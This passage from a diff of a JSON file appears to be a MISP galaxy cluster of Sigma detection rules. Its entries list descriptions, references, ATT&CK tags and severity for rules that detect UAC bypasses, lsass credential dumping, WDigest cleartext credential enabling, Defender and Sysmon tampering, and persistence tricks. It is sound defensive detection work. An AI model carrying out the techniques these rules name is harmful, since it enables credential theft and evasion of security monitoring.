"https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2022/09/29", - "filename": "registry_set_terminal_server_suspicious.yml", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", - "value": "RDP Sensitive Settings Changed", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - 
"http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2022/08/06", - "filename": "registry_set_terminal_server_tampering.yml", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "value": "Set TimeProviders DllName", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "creation_date": "2022/06/19", - "filename": "registry_set_timeproviders_dllname.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect 
modification of TreatAs key to enable \"rundll32.exe -sta\" command", - "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", - "value": "COM Hijacking via TreatAs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/08/28", - "filename": "registry_set_treatas_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects UAC bypass method using Windows event viewer", - "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "value": "UAC Bypass via Event Viewer - Registry Set", - "meta": { - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ], - "creation_date": "2017/03/19", - "filename": "registry_set_uac_bypass_eventvwr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", - "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", - "value": "UAC Bypass via Sdclt", - "meta": { - "refs": [ - "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ], - "creation_date": "2017/03/17", - "filename": "registry_set_uac_bypass_sdclt.yml", - "author": "Omer Yampel, Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", - "value": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "registry_set_uac_bypass_winsat.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", - "value": "UAC Bypass Using Windows Media Player - Registry", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - 
"attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "registry_set_uac_bypass_wmp.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", - "value": "VBScript Payload Stored in Registry", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2021/03/05", - "filename": "registry_set_vbs_payload_stored.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", - "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", - "value": "Execution DLL of Choice Using WAB.EXE", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", - "https://twitter.com/Hexacorn/status/991447379864932352", - "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/13", - "filename": "registry_set_wab_dllpath_reg_change.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", - "value": "Wdigest Enable UseLogonCredential", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2019/09/12", - "filename": "registry_set_wdigest_enable_uselogoncredential.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", - "value": "Disable Windows Defender Functionalities Via Registry Keys", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", - "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_windows_defender_tamper.yml", - "author": "AlertIQ, J\u00e1n Tren\u010dansk\u00fd, frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", - "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", - "value": "Winlogon AllowMultipleTSSessions Enable", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/09/09", - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", - "author": "Nasreddine 
Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitmate use of the multi session functionality" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "value": "Winlogon Notify Key Logon Persistence", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ], - "creation_date": "2021/12/30", - "filename": "registry_set_winlogon_notify_key.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "value": "Add DLLPathOverride Entry For Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/naturallanguage6.html", - "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/regsitry_set_natural_language_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "regsitry_set_natural_language_persistence.yml", - 
"author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects Accessing to lsass.exe by Powershell", - "uuid": "3f07b9d1-2082-4c56-9277-613a621983cc", - "value": "Accessing WinAPI in PowerShell for Credentials Dumping", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2020/10/06", - "filename": "sysmon_accessing_winapi_in_powershell_credentials_dumping.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "value": "Sysmon Configuration Change", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/12", - "filename": "sysmon_config_modification.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative action" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "value": "Sysmon Configuration Error", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ], - "creation_date": "2021/06/04", - "filename": "sysmon_config_modification_error.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate administrative action" - ], - "logsource.category": "sysmon_error", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "value": "Sysmon Configuration Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564" - ], - "creation_date": "2021/06/04", - "filename": "sysmon_config_modification_status.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate administrative action" - ], - "logsource.category": "sysmon_status", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.", - "uuid": "e554f142-5cf3-4e55-ace9-a1b59e0def65", - "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon", - "meta": { - "refs": [ - 
"https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" - ], - "creation_date": "2020/10/12", - "filename": "sysmon_dcom_iertutil_dll_hijack.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "value": "Sysmon Blocked Executable", - "meta": { - "refs": [ - "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/16", - "filename": "sysmon_file_block_exe.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_block", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "value": "Sysmon Process Hollowing Detection", - "meta": { - "refs": [ - "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", - "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" - ], - 
"creation_date": "2022/01/25", - "filename": "sysmon_process_hollowing.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", - "level": "high", - "falsepositive": [ - "There are no known false positives at this time" - ], - "logsource.category": "process_tampering", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of WMI event subscription persistence method", - "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "value": "WMI Event Subscription", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2019/01/12", - "filename": "sysmon_wmi_event_subscription.yml", - "author": "Tom Ueltschi (@c_APT_ure)", - "level": "medium", - "falsepositive": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" - ], - "logsource.category": "wmi_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious encoded payloads in WMI Event Consumers", - "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", - "value": "Suspicious Encoded Scripts in a WMI Consumer", - "meta": { - "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2021/09/01", - "filename": "sysmon_wmi_susp_encoded_scripts.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "wmi_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", - "value": "Suspicious Scripting in a WMI 
Consumer", - "meta": { - "refs": [ - "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", - "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "creation_date": "2019/04/15", - "filename": "sysmon_wmi_susp_scripting.yml", - "author": "Florian Roth, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Legitimate administrative scripts" - ], - "logsource.category": "wmi_event", - "logsource.product": "windows" - } - } - ], - "version": 1 -} \ No newline at end of file + "authors": [ + "@Joseliyo_Jstnk" + ], + "category": "rules", + "description": "MISP galaxy cluster based on Sigma Rules.", + "name": "Sigma-Rules", + "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", + "type": "sigma-rules", + "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", + "values": [ + { + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_exploiting.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "value": "Antivirus Exploitation Framework Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports 
a hack tool or other attack tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_hacktool.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", + "value": "Antivirus Hacktool Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_password_dumper.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558", + "attack.t1003.001", + "attack.t1003.002" + ] + }, + "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + "value": "Antivirus Password Dumper Detection" + }, + { + "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", + "meta": { + "author": "Sittikorn S, Nuttakorn T, Tim Shelton", + "creation_date": "2021/07/01", + "falsepositive": [ + "Unlikely, or pending PSP analysis" + ], + "filename": "av_printernightmare_cve_2021_34527.yml", + "level": 
"critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/mvelazco/status/1410291741241102338", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", + "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports ransomware", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_ransomware.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/?s=antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" + ], + "tags": [ + "attack.t1486" + ] + }, + "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", + "value": "Antivirus Ransomware Detection" + }, + { + "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_relevant_files.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ] + }, + "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", + 
"value": "Antivirus Relevant File Paths Alerts" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_webshell.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", + "value": "Antivirus Web Shell Detection" + }, + { + "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", + "meta": { + "author": "Thomas Patzke", + "creation_date": 
"2017/08/05", + "falsepositive": [ + "Application bugs" + ], + "filename": "appframework_django_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "django", + "refs": [ + "https://docs.djangoproject.com/en/1.11/ref/exceptions/", + "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", + "value": "Django Framework Exceptions" + }, + { + "description": "Generic rule for SQL exceptions in Python according to PEP 249", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/12", + "falsepositive": [ + "Application bugs" + ], + "filename": "app_python_sql_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "python", + "refs": [ + "https://www.python.org/dev/peps/pep-0249/#exceptions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", + "value": "Python SQL Exceptions" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_atsvc_lateral_movement.yml", + "level": "high", + 